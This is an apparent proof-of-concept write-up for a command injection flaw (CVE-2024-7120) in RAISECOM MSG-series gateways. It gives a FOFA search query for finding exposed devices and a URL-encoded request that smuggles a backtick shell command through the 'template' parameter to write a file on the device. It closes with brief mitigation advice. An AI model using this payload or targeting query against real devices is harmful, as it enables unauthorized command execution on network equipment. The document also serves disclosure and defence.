# Raisecom Devices Command Injection (CVE-2024-7120) Proof of concept!

# Overview

A command injection vulnerability has been identified in the RAISECOM Gateway devices, affecting models MSG1200, MSG2100E, MSG2200, and MSG2300. This vulnerability allows remote attackers to execute arbitrary commands on the system via the web interface. The issue resides in the `list_base_config.php` script, specifically via the `template` parameter, affecting over 25,112 devices on the Internet.

✔ FOFA : title="web user login" && body="<META content\=\"MSHTML 6.00.2900.5583\" name\=GENERATOR></HEAD>"

![banner](POC00.png)

# **Affected Devices**

## Hardware

- RAISECOM Gateway models MSG1200, MSG2100E, MSG2200, MSG2300

## Software

- 3.90

# Affected Components

**URI: `/vpn/list_base_config.php`**

**Description:** the `list_base_config.php` is a web-based interface component of RAISECOM Gateway devices used for managing VPN configurations. The identified vulnerability arises due to improper handling of the `template` parameter in this script. This parameter can be exploited to execute arbitrary commands on the device's operating system due to insufficient input sanitization. 

# CWE

CWE-77: Command Injection

# Exploitation

Here is an example of how the vulnerability can be exploited using a curl command:

```bash
GET "http://host.com/vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo%20-e%20%27{{Created by Ghost sec}}%27%3E%20%2Fwww%2Ftmp%2Finfo.html%60"
```

In this example, the `curl` command sends a malicious HTTP GET request to the `list_base_config.php` script. The request utilizes the `template` parameter to execute a command.

# Actual Result

## Sample 1

![banner](POC1.png)

## Sample 2

![banner](POC2.png)

# Recommendations

1. **Input Validation:** Implement strict validation checks on all user inputs, especially those that can affect system commands or file paths.
2. **Access Controls:** Restrict access to the device's web interface to trusted networks and authenticated users.
